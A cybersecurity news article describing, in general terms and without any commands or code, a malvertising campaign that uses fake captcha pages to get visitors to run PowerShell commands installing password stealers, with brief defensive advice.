Thursday, May 1, 2025
HomeCyber Security NewsBeware of Malicious Ads on Captcha Pages that Deliver Password Stealers

Beware of Malicious Ads on Captcha Pages that Deliver Password Stealers

Published on

SIEM as a Service

Follow Us on Google News

Malicious actors have taken cybercrime to new heights by exploiting captcha verification pages, a typically harmless security feature, to launch large-scale malware distribution campaigns.

This startling revelation uncovers how these fake captchas, interlaced with malicious advertising, are infecting users with password-stealing malware.

Over the past several weeks, cybercriminals have been leveraging fake captcha pages to trick users into executing harmful PowerShell commands.

- Advertisement - Google News

These fake captchas appear as pop-ups on certain websites, replicating the look and feel of legitimate human verification processes.

2024 MITRE ATT&CK Evaluation Results Released for SMEs & MSPs -> Download Free Guide

When users follow the instructions to “prove they’re human,” they inadvertently execute a PowerShell command that installs malware on their systems.

A visitor activating an ad-placement process and the ad network selecting the target creative (good or bad)
A visitor activating an ad-placement process and the ad network selecting the target creative (good or bad)

This malicious software is designed to steal passwords, financial information, private files, and social media credentials.

The success of this campaign lies in its simplicity and ability to evade user suspicion. The malware execution is hidden within what seems to be a routine process, leaving most victims unaware they’ve been compromised.

The Role of Malvertising in the Attack

The distribution of these malicious captchas is facilitated by malvertising or malicious advertising. Cybercriminals purchase ad space on legitimate websites through ad networks, inserting scripts that redirect users to fake captcha pages.

Example of a full fake captcha malvertising attack flow including all services in use
Example of a full fake captcha malvertising attack flow including all services in use

These ads are sophisticated, using advanced cloaking techniques to bypass moderation checks. Once the ad is served, it collects information about the user’s device and browser, determining the best way to deliver the malicious payload.

The system relies on a Traffic Distribution System (TDS), which analyzes the user’s profile and redirects them to the fake captcha page.

This seamless redirection process, often undetectable by end users, ensures the malware campaign operates at scale without raising red flags.

Monetag and the Ecosystem of Malicious Ads

A notable player in this campaign is Monetag, an ad network accused of enabling malicious advertising.

A real example of powerful SEO - First Google Search results pointing to a Monetag-enabled site
A real example of powerful SEO – First Google Search results pointing to a Monetag-enabled site

Unfortunately, malicious actors have exploited these tools to serve fake captcha pages. By leveraging ad tracking services like BeMob to disguise their intent, attackers bypass Monetag’s content moderation, making it challenging to detect and remove harmful ads.

Monetag’s TDS domains direct link to Android/Desktop adware as well as Propeller-Ads infra
Monetag’s TDS domains direct link to Android/Desktop adware as well as Propeller-Ads infra

The attackers frequently update their malware scripts and captcha designs to evade detection, ensuring the campaign remains effective.

Reports indicate that these campaigns generate over one million ad impressions per day, affecting thousands of legitimate websites.

This campaign primarily targets users visiting websites offering free or pirated content, such as streaming platforms and download hubs. These sites, known for aggressive advertising practices, become unwitting participants in the attack.

In some cases, compromised websites or cloned templates are used to spread these fake captcha scripts further, increasing the scale of the infection.

Malware dropping
Malware dropping

According to the Labs Guard in Medium, Sophisticated search engine optimization (SEO) tactics ensure these malicious websites rank highly on search engines, attracting a steady stream of unsuspecting visitors.

Once on the site, users are funneled into the fake captcha attack flow through intrusive ad placements.

To safeguard against these threats, users must adopt proactive security practices. Avoid clicking on pop-ups or captcha prompts that seem suspicious or lead to unexpected actions.

Using reputable ad blockers can minimize exposure to malvertising while keeping your operating system and antivirus software updated can help detect and prevent malware execution.

Finally, stay vigilant when browsing high-risk websites, especially those offering free or pirated content.

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Apache ActiveMQ Vulnerability Lets Remote Hackers Execute Arbitrary Code

A high vulnerability in Apache ActiveMQ’s .NET Message Service (NMS) library has been uncovered,...

Commvault Confirms Zero-Day Attack Breached Its Azure Cloud Environment

Commvault, a global leader in data protection and information management, has confirmed that a...

FBI Uncovers 42,000 Phishing Domains Tied to LabHost PhaaS Operation

The Federal Bureau of Investigation (FBI) has revealed the existence of 42,000 phishing domains...

Tor Browser 14.5.1 Released with Enhanced Security and New Features

The Tor Project has announced the official release of Tor Browser 14.5.1, introducing a...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Apache ActiveMQ Vulnerability Lets Remote Hackers Execute Arbitrary Code

A high vulnerability in Apache ActiveMQ’s .NET Message Service (NMS) library has been uncovered,...

Commvault Confirms Zero-Day Attack Breached Its Azure Cloud Environment

Commvault, a global leader in data protection and information management, has confirmed that a...

FBI Uncovers 42,000 Phishing Domains Tied to LabHost PhaaS Operation

The Federal Bureau of Investigation (FBI) has revealed the existence of 42,000 phishing domains...